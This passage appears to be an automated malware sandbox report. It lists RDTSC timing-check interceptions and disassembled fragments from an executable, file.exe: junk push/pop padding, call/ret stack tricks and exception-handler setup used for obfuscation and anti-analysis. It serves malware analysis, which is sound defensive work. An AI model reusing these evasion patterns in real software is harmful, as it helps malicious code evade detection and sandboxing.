                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 268A03 second address: 268A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ECCCADEAh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 268A11 second address: 268A1E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 268A1E second address: 268A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ECCCADF4h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 268A3C second address: 268A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 268A42 second address: 268A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 268A48 second address: 268A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 267DC1 second address: 267DDA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD7ECCCADE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FD7ECCCADEBh 0x00000012 pop edi 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 267DDA second address: 267DF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FD7ED120766h 0x00000009 jmp 00007FD7ED12076Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 267DF2 second address: 267E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnp 00007FD7ECCCADE6h 0x0000000c jmp 00007FD7ECCCADF9h 0x00000011 pop esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 267E21 second address: 267E27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2680F2 second address: 2680F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2680F8 second address: 2680FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2680FC second address: 268102 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 268102 second address: 268108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 268108 second address: 26810C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26810C second address: 268121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD7ED12076Bh 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26AA4F second address: 26AA96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 7FE3793Bh 0x00000010 sub dword ptr [ebp+122D35E1h], edi 0x00000016 call 00007FD7ECCCADE9h 0x0000001b push eax 0x0000001c pushad 0x0000001d push edx 0x0000001e pop edx 0x0000001f jmp 00007FD7ECCCADEBh 0x00000024 popad 0x00000025 pop eax 0x00000026 push eax 0x00000027 pushad 0x00000028 pushad 0x00000029 jp 00007FD7ECCCADE6h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26AA96 second address: 26AAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD7ED120773h 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26AFED second address: 26AFFE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD7ECCCADE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26AFFE second address: 26B002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B7C6 second address: 26B7D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD7ECCCADE6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B881 second address: 26B885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B885 second address: 26B88B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26BA79 second address: 26BA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26BA82 second address: 26BA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C1E9 second address: 26C1EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C1EF second address: 26C1F9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD7ECCCADECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C1F9 second address: 26C244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FD7ED120768h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D2194h], edx 0x00000029 push 00000000h 0x0000002b mov esi, dword ptr [ebp+122D1CC1h] 0x00000031 push 00000000h 0x00000033 mov dword ptr [ebp+122D1CABh], eax 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push esi 0x0000003f pop esi 0x00000040 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C244 second address: 26C24A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26E67C second address: 26E680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26E37A second address: 26E37E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26F0DC second address: 26F0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26FC68 second address: 26FC72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD7ECCCADE6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 271374 second address: 27137A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27137A second address: 27137E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 229D0A second address: 229D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 229D0F second address: 229D42 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD7ECCCAE09h 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FD7ECCCADE6h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2710B1 second address: 2710B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2710B5 second address: 2710C9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD7ECCCADE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007FD7ECCCADEEh 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 278335 second address: 27833B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2792E5 second address: 2792F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2792F7 second address: 2792FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 278499 second address: 2784B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD7ECCCADF4h 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27953E second address: 279544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27A3D9 second address: 27A3E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 279544 second address: 27954E instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7ED12076Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27B238 second address: 27B2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jmp 00007FD7ECCCADF1h 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FD7ECCCADE8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e and edi, dword ptr [ebp+122D2DDFh] 0x00000034 mov dword ptr [ebp+122D2A58h], ebx 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122D1E9Ah], ecx 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007FD7ECCCADE8h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 00000018h 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e adc bh, FFFFFFBBh 0x00000061 xchg eax, esi 0x00000062 pushad 0x00000063 push ecx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27B2B7 second address: 27B2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD7ED120776h 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27A4D1 second address: 27A4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27B2DD second address: 27B2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27A4D5 second address: 27A4D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C3F2 second address: 27C3F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27C3F6 second address: 27C3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27E3C7 second address: 27E41B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FD7ED120776h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FD7ED120768h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov ebx, ecx 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push ebx 0x00000034 jne 00007FD7ED120766h 0x0000003a pop ebx 0x0000003b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27E41B second address: 27E422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27F545 second address: 27F55E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27F55E second address: 27F568 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD7ECCCADE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27D5D5 second address: 27D679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120770h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FD7ED120768h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007FD7ED120768h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D2A96h], eax 0x0000004c mov dword ptr fs:[00000000h], esp 0x00000053 call 00007FD7ED12076Eh 0x00000058 mov ebx, esi 0x0000005a pop ebx 0x0000005b mov eax, dword ptr [ebp+122D0859h] 0x00000061 xor dword ptr [ebp+122D2091h], ecx 0x00000067 push FFFFFFFFh 0x00000069 mov dword ptr [ebp+1245E851h], eax 0x0000006f nop 0x00000070 jl 00007FD7ED120770h 0x00000076 push eax 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27F568 second address: 27F5E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jnc 00007FD7ECCCADE7h 0x00000010 push 00000000h 0x00000012 mov bx, ax 0x00000015 mov dword ptr [ebp+1245DDA9h], edx 0x0000001b push 00000000h 0x0000001d jc 00007FD7ECCCADECh 0x00000023 add dword ptr [ebp+122D3298h], eax 0x00000029 pushad 0x0000002a call 00007FD7ECCCADF4h 0x0000002f mov si, di 0x00000032 pop esi 0x00000033 mov ebx, 66939C5Ah 0x00000038 popad 0x00000039 xchg eax, esi 0x0000003a jmp 00007FD7ECCCADEFh 0x0000003f push eax 0x00000040 pushad 0x00000041 jg 00007FD7ECCCADE8h 0x00000047 jbe 00007FD7ECCCADECh 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27D679 second address: 27D67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27D67D second address: 27D681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27F6E4 second address: 27F6EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27F6EE second address: 27F6F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27F6F2 second address: 27F791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D377Ah], esi 0x0000000e push dword ptr fs:[00000000h] 0x00000015 pushad 0x00000016 mov esi, dword ptr [ebp+12454913h] 0x0000001c mov esi, dword ptr [ebp+122D2E0Bh] 0x00000022 popad 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FD7ED120768h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000014h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D1F21h], ebx 0x0000004a mov eax, dword ptr [ebp+122D1471h] 0x00000050 push 00000000h 0x00000052 push esi 0x00000053 call 00007FD7ED120768h 0x00000058 pop esi 0x00000059 mov dword ptr [esp+04h], esi 0x0000005d add dword ptr [esp+04h], 0000001Bh 0x00000065 inc esi 0x00000066 push esi 0x00000067 ret 0x00000068 pop esi 0x00000069 ret 0x0000006a sub dword ptr [ebp+122D3840h], eax 0x00000070 mov edi, dword ptr [ebp+122D37D7h] 0x00000076 push FFFFFFFFh 0x00000078 push eax 0x00000079 pushad 0x0000007a jmp 00007FD7ED120776h 0x0000007f push eax 0x00000080 push edx 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 281A9D second address: 281AA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27F791 second address: 27F795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 281AA2 second address: 281B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 jno 00007FD7ECCCADE8h 0x0000000f pop esi 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FD7ECCCADE8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d mov edi, dword ptr [ebp+122D1CB5h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007FD7ECCCADE8h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f mov bl, dh 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 281B08 second address: 281B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 281B0E second address: 281B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 281B13 second address: 281B1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 281B1A second address: 281B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 281B27 second address: 281B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD7ED120766h 0x0000000a popad 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 283AD8 second address: 283ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 283ADF second address: 283AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 283C4B second address: 283C63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 283C63 second address: 283C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FD7ED12076Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 283C7A second address: 283CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e mov dword ptr [ebp+122D2EDDh], edi 0x00000014 mov edi, dword ptr [ebp+122D2599h] 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 mov dword ptr [ebp+122D39C0h], edi 0x00000027 mov eax, dword ptr [ebp+122D002Dh] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FD7ECCCADE8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 push FFFFFFFFh 0x00000049 js 00007FD7ECCCADECh 0x0000004f sub ebx, dword ptr [ebp+122D2D33h] 0x00000055 nop 0x00000056 push ecx 0x00000057 push ebx 0x00000058 je 00007FD7ECCCADE6h 0x0000005e pop ebx 0x0000005f pop ecx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FD7ECCCADECh 0x00000069 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 283CF0 second address: 283CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286B33 second address: 286B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ECCCADECh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286B43 second address: 286B4B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
